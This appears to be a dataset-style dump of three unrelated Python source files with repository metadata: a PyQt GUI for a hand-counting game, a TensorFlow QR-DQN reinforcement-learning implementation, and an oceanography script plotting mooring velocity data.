# self.ai_left.setText("")
# self.ai_right.setText("")
@Slot(object)
def stateResultCallback(self, game_state: GameState):
print("SLOT STATE ")
game_state.print()
self.changePlayerLeftHandTo(game_state.values[0][0])
self.changePlayerRightHandTo(game_state.values[0][1])
# self.player_left.setText(str(game_state.values[0][0]))
# self.player_right.setText(str(game_state.values[0][1]))
self.ai_left.setText(str(game_state.values[1][0]))
self.ai_right.setText(str(game_state.values[1][1]))
def changePlayerLeftHandTo(self, number):
# self.player_left.setPixmap()
image_hand = QtGui.QPixmap("Assets/Player1/"+str(number)+"Kiri.png")
self.player_left.setPixmap(image_hand)
self.player_left.setScaledContents(True)
pass
def changePlayerRightHandTo(self, number):
# self.player_right.setPixmap()
image_hand = QtGui.QPixmap("Assets/Player1/" + str(number) + "Kanan.png")
self.player_right.setPixmap(image_hand)
self.player_right.setScaledContents(True)
pass
def playerLeftClicked(self, event):
if self.clicked_player != "":
self.playerTurnSignal.emit(4)
self.clicked_player = ""
else:
self.clicked_player = "left"
def playerRightClicked(self, event):
if self.clicked_player != "":
self.playerTurnSignal.emit(4)
self.clicked_player = ""
else:
self.clicked_player = "right"
def aiLeftClicked(self, event):
# self.ai_clicked = "left"
if (self.clicked_player == 'left'):
self.playerTurnSignal.emit(0)
elif self.clicked_player == 'right':
self.playerTurnSignal.emit(3)
self.clicked_player = ""
def aiRightClicked(self, event):
# self.ai_clicked = "right"
if (self.clicked_player == 'left'):
self.playerTurnSignal.emit(1)
elif self.clicked_player == 'right':
self.playerTurnSignal.emit(2)
self.clicked_player = ""
def startButtonClicked(self):
self.home_frame.hide()
self.ingame_frame.raise_()
self.ingame_frame.show()
# self.the_game.start()
def exitPressed(self):
self.the_game.stop()
self.exit()
def closeEvent(self, event):
print("QUIT BROOO")
self.exitPressed()
sys.exit()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Form = QtWidgets.QWidget()
gui_main = GameGui(Form)
# gui_main.setupUi(Form)
# Form.show()
sys.exit(app.exec_()) | [
"azidan.it@gmail.com"
] | azidan.it@gmail.com |
df6e6e69e1c13991b7bd340db0e3092655522236 | c328467ea14424f35cca4fc756488ece38b88272 | /unstable_baselines/algo/d/qrdqn/model.py | cb6ed37aac33e446701fe16a7a429157ea5416b2 | [
"MIT"
] | permissive | Ending2015a/unstable_baselines | 4b2d44f0bd46d2ba75b02a138f9218114317a5ee | 1d304115406f6e29186cedb0160811d4139e2733 | refs/heads/master | 2023-07-31T21:09:01.809727 | 2021-09-17T08:54:45 | 2021-09-17T08:54:45 | 338,553,782 | 10 | 0 | MIT | 2021-09-17T08:45:50 | 2021-02-13T10:55:54 | Python | UTF-8 | Python | false | false | 37,547 | py | __copyright__ = '''
The MIT License (MIT)
Copyright (c) 2021 Joe Hsiao
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
'''
__license__ = 'MIT'
# --- built in ---
import os
import sys
import time
import random
import datetime
# --- 3rd party ---
import gym
import numpy as np
import tensorflow as tf
# --- my module ---
from unstable_baselines import logger
from unstable_baselines.base import (SavableModel,
TrainableModel)
from unstable_baselines.bugs import ReLU
from unstable_baselines.sche import Scheduler
from unstable_baselines.utils import (is_image_observation,
preprocess_observation,
get_input_tensor_from_space)
# create logger
LOG = logger.getLogger('QRDQN')
# === Buffers ===
class ReplayBuffer():
'''
Replay buffer
'''
def __init__(self, buffer_size):
self.buffer_size = buffer_size
self.reset()
def reset(self):
self.pos = 0
self.full = False
self.obss = None
self.acts = None
self.next_obss = None
self.rews = None
self.dones = None
def add(self, observations, next_observations, actions, rewards, dones):
'''Add new samples into replay buffer
Args:
observations (np.ndarray): numpy array of type np.uint8,
shape (n_envs, obs_space.shape).
next_observations (np.ndarray): numpy array of type np.uint8,
shape (n_envs, obs_space.shape).
actions (np.ndarray): discrete actions, numpy array of type
np.int32 or np.int64, shape (n_envs, act_space.n)
rewards (np.ndarray): numpy array of type np.float32 or
np.float64, shape (n_envs,)
dones (np.ndarray): numpy array of type np.float32 or
np.bool, shape (n_envs,)
'''
obss = np.asarray(observations)
next_obss = np.asarray(next_observations)
actions = np.asarray(actions)
rewards = np.asarray(rewards)
dones = np.asarray(dones)
n_env = obss.shape[0]
if self.obss is None:
# create spaces
self.obss = np.zeros((self.buffer_size, ) + obss.shape[1:], dtype=obss.dtype)
self.acts = np.zeros((self.buffer_size, ) + actions.shape[1:], dtype=actions.dtype)
self.next_obss = np.zeros((self.buffer_size, ) + obss.shape[1:], dtype=obss.dtype)
self.rews = np.zeros((self.buffer_size, ) + rewards.shape[1:], dtype=rewards.dtype)
self.dones = np.zeros((self.buffer_size, ) + dones.shape[1:], dtype=dones.dtype)
idx = np.arange(self.pos, self.pos+n_env) % self.buffer_size
self.obss[idx, ...] = obss.copy()
self.acts[idx, ...] = actions.copy()
self.next_obss[idx, ...] = next_obss.copy()
self.rews[idx, ...] = rewards.copy()
self.dones[idx, ...] = dones.copy()
# increase start position
self.pos += n_env
if self.pos >= self.buffer_size:
self.full = True
self.pos = self.pos % self.buffer_size
def __len__(self):
if self.full:
return self.buffer_size
else:
return self.pos
def __call__(self, batch_size=None):
'''Randomly sample a batch from replay buffer
Args:
batch_size (int, optional): Batch size. Defaults to None.
Returns:
np.ndarray: observations, shape (batch_size, obs_space.shape)
np.ndarray: actions, shape (batch_size, act_space.n)
np.ndarray: next observations, shape (batch_size, obs_space.shape)
np.ndarray: dones, shape (batch_size,)
np.ndarray: rewards, shape (batch_size,)
'''
if batch_size is None:
batch_size = len(self)
batch_inds = np.random.randint(0, len(self), size=batch_size)
return self._get_samples(batch_inds)
def _get_samples(self, batch_inds):
return (self.obss[batch_inds],
self.acts[batch_inds],
self.next_obss[batch_inds],
self.dones[batch_inds],
self.rews[batch_inds])
# === Networks ===
class NatureCnn(tf.keras.Model):
def __init__(self, **kwargs):
'''
Nature CNN originated from
"Playing Atari with Deep Reinforcement Learning"
'''
super().__init__(**kwargs)
self._layers = [
tf.keras.layers.Conv2D(32, 8, 4, name='conv1'),
ReLU(name='relu1'),
tf.keras.layers.Conv2D(64, 4, 2, name='conv2'),
ReLU(name='relu2'),
tf.keras.layers.Conv2D(64, 3, 1, name='conv3'),
ReLU(name='relu3'),
tf.keras.layers.Flatten(name='flatten'),
tf.keras.layers.Dense(512, name='fc'),
ReLU(name='relu4')
]
@tf.function
def call(self, inputs, training=False):
'''Forward network
Args:
inputs (tf.Tensor): Expecting 4-D batch observations, shape
(batch, height, width, channel)
training (bool, optional): Training mode. Defaults to False.
Returns:
tf.Tensor: Latent vectors.
'''
x = inputs
for layer in self._layers:
x = layer(x)
return x
# Mlp feature extractor
class MlpNet(tf.keras.Model):
'''MLP feature extractor'''
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._layers = [
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(64, name='fc1'),
ReLU(name='relu1'),
tf.keras.layers.Dense(64, name='fc2'),
ReLU(name='relu2'),
]
@tf.function
def call(self, inputs, training=False):
'''Forward network
Args:
inputs (tf.Tensor): Expecting batch observations, shape
(batch, obs_space.shape)
training (bool, optional): Training mode. Defaults to False.
Returns:
tf.Tensor: Latent vectors.
'''
x = inputs
for layer in self._layers:
x = layer(x)
return x
# Quantile Q-value network
class QuantileQNet(tf.keras.Model):
def __init__(self, action_space, n_quantiles, **kwargs):
super().__init__(**kwargs)
self._layers = [
tf.keras.layers.Dense(action_space.n * n_quantiles)
]
# output shape
self._o_shape = (-1, action_space.n, n_quantiles)
@tf.function
def call(self, inputs, training=False):
'''Forward network
Args:
inputs (tf.Tensor): Expecting a latent vector in shape
(batch, latent_size), tf.float32.
training (bool, optional): Training mode. Defaults to False.
Returns:
tf.Tensor: Predicted quantile Q values in shape
(batch, act_space.n, n_quantiles)
'''
x = inputs
for layer in self._layers:
x = layer(x)
return tf.reshape(x, self._o_shape)
# === Agent, Model ===
class Agent(SavableModel):
def __init__(self, observation_space, action_space, n_quantiles=200, force_mlp=False, **kwargs):
'''QRDQN Agent
Args:
observation_space (gym.Spaces): The observation space of the environment.
Can be None for delayed setup.
action_space (gym.Spaces): The action space of the environment.
Can be None for delayed setup.
n_quantiles (int, optional): Number of quantiles. Default to 200.
force_mlp (bool, optional): Force to use MLP feature extractor.
Defaults to False.
'''
super().__init__(**kwargs)
self.n_quantiles = n_quantiles
self.force_mlp = force_mlp
# --- Initialize ---
self.observation_space = None
self.action_space = None
self.net = None
self.q_net = None
if (observation_space is not None) and (action_space is not None):
self.setup_model(observation_space, action_space)
def setup_model(self, observation_space, action_space):
'''Setup model and networks
Args:
observation_space (gym.Spaces): The observation space of the
environment.
action_space (gym.Spaces): The action space of the environment.
'''
self.observation_space = observation_space
self.action_space = action_space
# --- setup model ---
if (is_image_observation(observation_space)
and (not self.force_mlp)):
self.net = NatureCnn()
else:
self.net = MlpNet()
self.q_net = QuantileQNet(action_space, n_quantiles=self.n_quantiles)
# construct networks
inputs = get_input_tensor_from_space(observation_space)
outputs = self.net(inputs)
self.q_net(outputs)
@tf.function
def _forward(self, inputs, training=True):
'''Forward actor
Args:
inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
tf.uint8 for image observations and tf.float32 for non-image
observations.
training (bool, optional): Determine whether in training mode. Default
to True.
Return:
tf.Tensor: predicted quentile Q values in shape (batch, act_space.n, n_quantiles),
tf.float32
'''
# cast and normalize non-float32 inputs (e.g. image with uint8)
# NOTICE: image in float32 is considered as already normalized
inputs = preprocess_observation(inputs, self.observation_space)
# forward network
latent = self.net(inputs, training=training)
# forward value net
values = self.q_net(latent, training=training)
return values
@tf.function
def call(self, inputs, training=True):
'''Batch predict actions
Args:
inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
tf.uint8 for image observations and tf.float32 for non-image
observations.
training (bool, optional): Determine whether in training mode. Default
to True.
Returns:
tf.Tensor: Predicted actions in shape (batch, ), tf.int64
tf.Tensor: Predicted state-action values in shape (batch, act_space.n),
tf.float32
tf.Tensor: Predicted quantile Q values shape (batch, act_space.n, n_quantiles)
'''
# forward
quan_vals = self._forward(inputs, training=training) # (batch, act_space.n, n_quantiles)
values = tf.math.reduce_mean(quan_vals, axis=-1) # (batch, act_space.n)
actions = tf.math.argmax(values, axis=-1) # (batch,)
return actions, values, quan_vals
def predict(self, inputs):
'''Predict actions
Args:
inputs (np.ndarray): batch observations in shape (batch, obs_space.shape)
or a single observation in shape (obs_space.shape). np.uint8 for image
observations and np.float32 for non-image observations.
Returns:
np.ndarray: predicted actions in shape (batch, ) or (), np.int64
'''
one_sample = (len(inputs.shape) == len(self.observation_space.shape))
if one_sample:
inputs = np.expand_dims(inputs, axis=0)
# predict
outputs, *_ = self(inputs, training=False)
outputs = outputs.numpy()
if one_sample:
outputs = np.squeeze(outputs, axis=0)
# predict
return outputs
def get_config(self):
config = {'observation_space': self.observation_space,
'action_space': self.action_space,
'n_quantiles': self.n_quantiles,
'force_mlp': self.force_mlp}
return config
class QRDQN(TrainableModel):
def __init__(self, env, learning_rate: float = 3e-4,
buffer_size: int = int(1e6),
min_buffer: int = 50000,
n_quantiles: int = 200,
n_steps: int = 4,
n_gradsteps: int = 1,
batch_size: int = 64,
gamma: float = 0.99,
tau: float = 1.0,
kappa: float = 1.0,
max_grad_norm: float = 0.5,
force_mlp: bool = False,
explore_schedule: Scheduler = 0.3,
verbose: int = 0,
**kwargs):
'''Quantile-Regression DQN (QRDQN)
The implementation mainly follows its originated paper
`Distributional Reinforcement Learning with Quantile Regression` by Dabney et al.
The first argument `env` can be `None` for delayed model setup. You
should call `set_env()` then call `setup_model()` to manually setup
the model.
Args:
env (gym.Env): Training environment. Can be `None`.
learning_rate (float, optional): Learning rate. Defaults to 3e-4.
buffer_size (int, optional): Maximum size of the replay buffer. Defaults to 1000000.
min_buffer (int, optional): Minimum size of the replay buffer before training.
Defaults to 50000.
n_quantiles (int, optional): Number of quantiles. Default to 200.
n_steps (int, optional): number of steps of rollouts to collect for every epoch.
Defaults to 100.
n_gradsteps (int, optional): number of gradient steps in one epoch.
Defaults to 200.
batch_size (int, optional): Training batch size. Defaults to 128.
gamma (float, optional): Decay rate. Defaults to 0.99.
tau (float, optional): Polyak update parameter. Defaults to 1.0.
kappa (float, optional): Kappa. Defaults to 1.0.
max_grad_norm (float, optional): Gradient clip range. Defaults to 0.5.
force_mlp (bool, optional): Force to use MLP feature extractor. Defaults to False.
explore_schedule (Sheduler, optional): Epsilon greedy scheduler. Defaults to 0.3.
verbose (int, optional): More training log. Defaults to 0.
'''
super().__init__(**kwargs)
self.env = env
self.learning_rate = learning_rate
self.buffer_size = buffer_size
self.min_buffer = min_buffer
self.n_quantiles = n_quantiles
self.n_steps = n_steps
self.n_gradsteps = n_gradsteps
self.batch_size = batch_size
self.gamma = gamma
self.tau = tau
self.kappa = kappa
self.max_grad_norm = max_grad_norm
self.force_mlp = force_mlp
self.explore_schedule = explore_schedule
self.verbose = verbose
# initialize states
self.buffer = None
self.tb_writer = None
self.observation_space = None
self.action_space = None
self.n_envs = 0
if env is not None:
self.set_env(env)
self.setup_model(env.observation_space, env.action_space)
def set_env(self, env):
'''Set environment
If the environment is already set, you can call this function
to change the environment. But the observation space and action
space must be consistent with the original one.
Args:
env (gym.Env): Training environment.
'''
if self.observation_space is not None:
assert env.observation_space == self.observation_space, 'Observation space mismatch, expect {}, got {}'.format(
self.observation_space, env.observation_space)
if self.action_space is not None:
assert env.action_space == self.action_space, 'Action space mismatch, expect {}, got {}'.format(
self.action_space, env.action_space)
self.env = env
self.n_envs = env.n_envs
def setup_model(self, observation_space, action_space):
'''Setup model, optimizer and scheduler for training
Args:
observation_space (gym.Spaces): The observation space of the
environment.
action_space (gym.Spaces): The action space of the environment.
'''
self.observation_space = observation_space
self.action_space = action_space
# --- setup model ---
self.buffer = ReplayBuffer(buffer_size=self.buffer_size)
self.agent = Agent(self.observation_space, self.action_space,
n_quantiles=self.n_quantiles, force_mlp=self.force_mlp)
self.agent_target = Agent(self.observation_space, self.action_space,
n_quantiles=self.n_quantiles, force_mlp=self.force_mlp)
self.optimizer = tf.keras.optimizers.Adam(learning_rate=self.learning_rate,
clipnorm=self.max_grad_norm)
# initialize target
self.agent_target.update(self.agent)
# setup scheduler
self.explore_schedule = Scheduler.get_scheduler(self.explore_schedule,
state_object=self.state)
@tf.function
def _forward(self, inputs, training=True):
'''Forward actor
Args:
inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
tf.uint8 for image observations and tf.float32 for non-image
observations.
training (bool, optional): Determine whether in training mode. Default
to True.
Return:
tf.Tensor: predicted quantile Q values in shape (batch, act_space.n, n_quantiles),
tf.float32
'''
return self.agent._forward(inputs, training=training)
@tf.function
def call(self, inputs, training=True):
'''Batch predict actions
Args:
inputs (tf.Tensor): batch observations in shape (batch, obs_space.shape).
tf.uint8 for image observations and tf.float32 for non-image
observations.
training (bool, optional): Determine whether in training mode. Default
to True.
Returns:
tf.Tensor: Predicted actions in shape (batch, ), tf.int64
tf.Tensor: Predicted state-action values in shape (batch, act_space.n),
tf.float32
tf.Tensor: Predicted quantile Q values shape (batch, act_space.n, n_quantiles)
'''
return self.agent(inputs, training=training)
def predict(self, inputs):
'''Predict actions
Args:
inputs (np.ndarray): batch observations in shape (batch, obs_space.shape)
or a single observation in shape (obs_space.shape). np.uint8 for image
observations and np.float32 for non-image observations.
Returns:
np.ndarray: predicted actions in shape (batch, ) or (), np.int64
'''
return self.agent.predict(inputs)
@tf.function
def value_loss(self, obs, action, next_obs, done, reward):
'''Compute loss
Args:
obs (tf.Tensor): batch observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
action (tf.Tensor): batch actions, shape (batch, ),
tf.int32 or tf.int64 for discrete action space
next_obs (tf.Tensor): batch next observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
done (tf.Tensor): batch done, shape (batch, ), tf.bool or tf.float32
reward (tf.Tensor): batch reward, shape (batch, ), tf.float32
Returns:
tf.Tensor: loss, tf.float32
'''
action = tf.cast(action, dtype=tf.int64)
reward = tf.cast(reward, dtype=tf.float32)
done = tf.cast(done, dtype=tf.float32)
reward = tf.expand_dims(reward, axis=-1) # (batch, 1)
done = tf.expand_dims(done, axis=-1) # (batch, 1)
# generate quantiles
tau_i = (np.arange(self.n_quantiles, dtype=np.float32) + 0.5) / self.n_quantiles
tau_i = tf.constant(tau_i) # (n_quantiles,)
tau_i = tf.reshape(tau_i, (1, -1, 1)) # (1, n_quantiles, 1)
# compute target quantile q values
next_act, _, next_qs = self.agent_target(next_obs)
target_q = tf.gather(next_qs, indices=next_act, batch_dims=1) # (batch, n_quantiles)
y = reward + (1.-done) * self.gamma * target_q # (batch, n_quantiles)
y = tf.stop_gradient(y)
# compute current quantile q values
qs = self.agent._forward(obs) # (batch, act_space.n, n_quantiles)
q = tf.gather(qs, indices=action, batch_dims=1) # (batch, n_quantiles)
# compute huber loss
y = tf.expand_dims(y, axis=-2) # (batch, 1, n_quantiles)
q = tf.expand_dims(q, axis=-1) # (batch, n_quantiles, 1)
u = y - q # (batch, n_quantiles, n_quantiles) td error
abs_u = tf.math.abs(u)
huber = tf.where(abs_u > self.kappa, self.kappa * (abs_u - 0.5*self.kappa),
0.5 * tf.math.square(u)) # (batch, n_quantiles, n_quantiles)
loss = tf.abs(tau_i - tf.cast(u < 0.0, dtype=tf.float32)) * huber # (batch, n_quantiles, n_quantiles)
loss = tf.math.reduce_mean(tf.math.reduce_sum(loss, axis=-2))
return loss
@tf.function
def _train_step(self, obs, action, next_obs, done, reward):
'''Perform one gradient update
Args:
obs (tf.Tensor): batch observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
action (tf.Tensor): batch actions, shape (batch, ),
tf.int32 or tf.int64 for discrete action space
next_obs (tf.Tensor): batch next observations, shape (batch, obs_space.shape),
tf.uint8 for image observations, tf.float32 for non-image observations
done (tf.Tensor): batch done, shape (batch, ), tf.bool or tf.float32
reward (tf.Tensor): batch reward, shape (batch, ), tf.float32
Returns:
tf.Tensor: loss, tf.float32
'''
variables = self.agent.trainable_variables
with tf.GradientTape() as tape:
tape.watch(variables)
loss = self.value_loss(obs, action, next_obs, done, reward)
# perform gradients
grads = tape.gradient(loss, variables)
self.optimizer.apply_gradients(zip(grads, variables))
return loss
def _run(self, steps, obs=None):
'''Run environments, collect rollouts
Args:
steps (int): number of timesteps
obs (np.ndarray, optional): the last observations. If `None`,
reset the environment.
Returns:
np.ndarray: the last observations.
'''
if obs is None:
obs = self.env.reset()
for _ in range(steps):
if (len(self.buffer) < self.min_buffer or
np.random.rand() < self.explore_schedule()):
# random action
action = np.asarray([self.action_space.sample()
for n in range(self.n_envs)])
else:
# predict action
action, *_ = self(obs)
# step environment
new_obs, reward, done, infos = self.env.step(action)
# add to buffer
self.buffer.add(obs, new_obs, action, reward, done)
obs = new_obs
# update state
self.num_timesteps += self.n_envs
return new_obs
def train(self, steps, batch_size, target_update):
'''Train one epoch
Args:
steps (int): gradient steps
batch_size (int): batch size
target_update (int): target network update frequency (gradient steps)
Returns:
float: mean loss
'''
all_loss = []
for _step in range(steps):
(obs, action, next_obs, done, reward) = self.buffer(batch_size)
loss = self._train_step(obs, action, next_obs, done, reward)
all_loss.append(loss)
self.num_gradsteps += 1
# update target networks
if self.num_gradsteps % target_update == 0:
self.agent_target.update(self.agent, polyak=self.tau)
m_loss = np.mean(np.hstack(np.asarray(all_loss)))
return m_loss
def eval(self, env, n_episodes=5, max_steps=-1):
'''Evaluate model (use default evaluation method)
Args:
env (gym.Env): the environment for evaluation
n_episodes (int, optional): number of episodes to evaluate.
Defaults to 5.
max_steps (int, optional): maximum steps in one episode.
Defaults to 10000. Set to -1 to run episodes until done.
Returns:
list: total rewards for each episode
list: episode length for each episode
'''
return super().eval(env, n_episodes=n_episodes,
max_steps=max_steps)
def learn(self, total_timesteps: int,
log_interval: int = 1000,
eval_env: gym.Env = None,
eval_interval: int = 10000,
eval_episodes: int = 5,
eval_max_steps: int = 3000,
save_interval: int = 10000,
save_path: str = None,
target_update: int = 2500,
tb_logdir: str = None,
reset_timesteps: bool = False):
'''Train QRDQN
Args:
total_timesteps (int): Total timesteps to train agent.
log_interval (int, optional): Print log every ``log_interval``
epochs. Defaults to 1.
eval_env (gym.Env, optional): Environment for evaluation.
Defaults to None.
eval_interval (int, optional): Evaluate every ``eval_interval``
epochs. Defaults to 1.
eval_episodes (int, optional): Evaluate ``eval_episodes`` episodes.
for every evaluation. Defaults to 5.
eval_max_steps (int, optional): maximum steps every evaluation.
Defaults to 10000.
save_interval (int, optional): Save model every ``save_interval``
epochs. Default to None.
save_path (str, optional): Model saving path. Default to None.
target_update (int, optional): Frequency of updating target network.
update every ``target_update`` gradient steps. Defaults to 10000.
tb_logdir (str, optional): tensorboard log directory. Defaults to None.
reset_timesteps (bool, optional): reset timesteps. Defaults to False.
Returns:
QRDQN: self
'''
assert self.env is not None, 'Env not set, call set_env() before training'
# create tensorboard writer
if tb_logdir is not None:
self.tb_writer = tf.summary.create_file_writer(tb_logdir)
# initialize state
if reset_timesteps:
self.num_timesteps = 0
self.num_gradsteps = 0
self.num_epochs = 0
self.progress = 0
# reset buffer
self.buffer.reset()
obs = None
time_start = time.time()
time_spent = 0
timesteps_per_epoch = self.n_steps * self.n_envs
total_epochs = int(float(total_timesteps-self.num_timesteps) /
float(timesteps_per_epoch) + 0.5)
while self.num_timesteps < total_timesteps:
# collect rollouts
obs = self._run(steps=self.n_steps, obs=obs)
# update state
self.num_epochs += 1
self.progress = float(self.num_timesteps) / float(total_timesteps)
if len(self.buffer) > self.min_buffer:
# training
loss = self.train(self.n_gradsteps,
batch_size=self.batch_size,
target_update=target_update)
# write tensorboard
if self.tb_writer is not None:
with self.tb_writer.as_default():
tf.summary.scalar('loss', loss, step=self.num_timesteps)
tf.summary.scalar('explore_rate', self.explore_schedule(),
step=self.num_timesteps)
self.tb_writer.flush()
# print training log
if (log_interval is not None) and (self.num_epochs % log_interval == 0):
# current time
time_now = time.time()
# execution time (one epoch)
execution_time = (time_now - time_start) - time_spent
# total time spent
time_spent = (time_now - time_start)
# remaining time
remaining_time = (time_spent / self.progress)*(1.0-self.progress)
# eta
eta = (datetime.datetime.now() + datetime.timedelta(seconds=remaining_time)).strftime('%Y-%m-%d %H:%M:%S')
# average steps per second
fps = float(self.num_timesteps) / time_spent
LOG.set_header('Epoch {}/{}'.format(self.num_epochs, total_epochs))
LOG.add_line()
LOG.add_row('Timesteps', self.num_timesteps, total_timesteps, fmt='{}: {}/{}')
LOG.add_row('Steps/sec', fps, fmt='{}: {:.2f}')
LOG.add_row('Progress', self.progress*100.0, fmt='{}: {:.2f}%')
if self.verbose > 0:
LOG.add_row('Execution time', datetime.timedelta(seconds=execution_time))
LOG.add_row('Elapsed time', datetime.timedelta(seconds=time_spent))
LOG.add_row('Remaining time', datetime.timedelta(seconds=remaining_time))
LOG.add_row('ETA', eta)
LOG.add_line()
if len(self.buffer) > self.min_buffer:
LOG.add_row('Loss', loss, fmt='{}: {:.6f}')
LOG.add_row('Explore rate', self.explore_schedule(), fmt='{}: {:.6f}')
else:
LOG.add_row('Collecting rollouts {}/{}'.format(len(self.buffer), self.min_buffer))
LOG.add_line()
LOG.flush('INFO')
# evaluate model
eps_rews, eps_steps = [], []
if (eval_env is not None) and (self.num_epochs % eval_interval == 0):
eps_rews, eps_steps = self.eval(env=eval_env,
n_episodes=eval_episodes,
max_steps=eval_max_steps)
max_idx = np.argmax(eps_rews)
max_rews = eps_rews[max_idx]
max_steps = eps_steps[max_idx]
mean_rews = np.mean(eps_rews)
std_rews = np.std(eps_rews)
mean_steps = np.mean(eps_steps)
if self.tb_writer is not None:
with self.tb_writer.as_default():
tf.summary.scalar('max_rewards', max_rews, step=self.num_timesteps)
tf.summary.scalar('mean_rewards', mean_rews, step=self.num_timesteps)
tf.summary.scalar('std_rewards', std_rews, step=self.num_timesteps)
tf.summary.scalar('mean_length', mean_steps, step=self.num_timesteps)
self.tb_writer.flush()
if self.verbose > 1:
for ep in range(eval_episodes):
LOG.set_header('Eval episode {}/{}'.format(ep+1, eval_episodes))
LOG.add_line()
LOG.add_row('Rewards', eps_rews[ep])
LOG.add_row(' Length', eps_steps[ep])
LOG.add_line()
LOG.flush('INFO')
LOG.set_header('Evaluate {}/{}'.format(self.num_epochs, total_epochs))
LOG.add_line()
LOG.add_row('Max rewards', max_rews)
LOG.add_row(' Length', max_steps)
LOG.add_line()
LOG.add_row('Mean rewards', mean_rews)
LOG.add_row(' Std rewards', std_rews, fmt='{}: {:.3f}')
LOG.add_row(' Mean length', mean_steps)
LOG.add_line()
LOG.flush('INFO')
# save model
if ((save_path is not None) and (save_interval is not None)
and (self.num_epochs % save_interval) == 0):
saved_path = self.save(save_path, checkpoint_number=self.num_epochs,
checkpoint_metrics=self.get_eval_metrics(eps_rews, eps_steps))
if self.verbose > 0:
LOG.info('Checkpoint saved to: {}'.format(saved_path))
# find the best model path
best_path = self._preload(save_path, best=True)
if best_path == os.path.abspath(saved_path):
LOG.debug(' (Current the best)')
return self
def get_config(self):
init_config = { 'learning_rate': self.learning_rate,
'buffer_size': self.buffer_size,
'min_buffer': self.min_buffer,
'n_quantiles': self.n_quantiles,
'n_steps': self.n_steps,
'n_gradsteps': self.n_gradsteps,
'batch_size': self.batch_size,
'gamma': self.gamma,
'tau': self.tau,
'kappa': self.kappa,
'max_grad_norm': self.max_grad_norm,
'force_mlp': self.force_mlp,
'explore_schedule': self.explore_schedule,
'verbose': self.verbose}
setup_config = {'observation_space': self.observation_space,
'action_space': self.action_space}
return {'init_config': init_config,
'setup_config': setup_config}
@classmethod
def from_config(cls, config):
assert 'init_config' in config, 'Failed to load {} config, init_config not found'.format(cls.__name__)
assert 'setup_config' in config, 'Failed to load {} config, setup_config not found'.format(cls.__name__)
init_config = config['init_config']
setup_config = config['setup_config']
# construct model
self = cls(env=None, **init_config)
self.setup_model(**setup_config)
return self | [
"joehsiao@gapp.nthu.edu.tw"
] | joehsiao@gapp.nthu.edu.tw |
4677fbdc2a00050d77fd0d794bb57194c2f5ee75 | e8e4bb89c6ce57c038de445091ddebc1c1b6eb26 | /oldscripts/Transport_permoor_newer.py | 7b4c40d98f9b1bbd636b05bd970899b248439250 | [] | no_license | ilebras/OSNAP | dc7fba846f866ec64edab35a278d2ce6c86e5f97 | a5b22026351d2eb8dc4c89e2949be97122936d23 | refs/heads/master | 2021-05-12T16:46:18.955345 | 2020-09-08T23:04:23 | 2020-09-08T23:04:23 | 117,025,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,958 | py | #################################################################################
#################################################################################
#################################################################################
######################## CALCULATE TRANSPORT ###################################
#################################################################################
#################################################################################
#################################################################################
from aux_funcs import *
daily=pickle.load(open('../pickles/CF_xarray_notid.pickle','rb'))
#################################################################################
# Have a quick look at CF1 evolution in time
#################################################################################
def plotmoortime(moornum):
figure(figsize=(12,3))
ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
ylim([170,0])
ylabel('depth (m)')
xlabel('date')
title('CF'+str(moornum)+' across track velocity')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
def plotmoortime(moornum):
figure(figsize=(12,3))
ax=contourf(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],cmap=cm.RdBu_r,vmin=-1.25,vmax=1.25)
colorbar(ticks=[-1.5,-1,-0.5,0,0.5])
contour(daily.date.data,daily.depth,daily['across track velocity'][moornum-1,:,:],[-0.75],colors='k')
ylim([170,0])
ylabel('depth (m)')
xlabel('date')
title('CF'+str(moornum)+' across track velocity')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.png',bbox_inches='tight')
savefig('../figures/hovmueller/cf'+str(moornum)+'_vel.pdf',bbox_inches='tight')
['salinity',linspace(32.5,35.5,31),cm.YlGnBu_r,arange(32,35.5,0.4),'']
for rr in range(1,9):
plotmoortime(rr)
#################################################################################
#################################################################################
############# Get EGCC and EGC transports ####################################
#################################################################################
#################################################################################
#################################################################################
# Quick code for looking at monthly averages
#################################################################################
def monthplot(afield):
figure()
afield.resample('M',dim='date',how='mean')[:12,:,:].plot(x='distance', y='depth', col='date', col_wrap=4)
monthplot(daily['across track velocity'])
ylim([1000,0])
#################################################################################
################ Find and examine isohalines ###################################
#################################################################################
#
# def find_isohaline(which):
#
# maxdepth=pd.DataFrame(index=daily.date, columns=daily.distance)
#
# for j, m in enumerate(daily.distance):
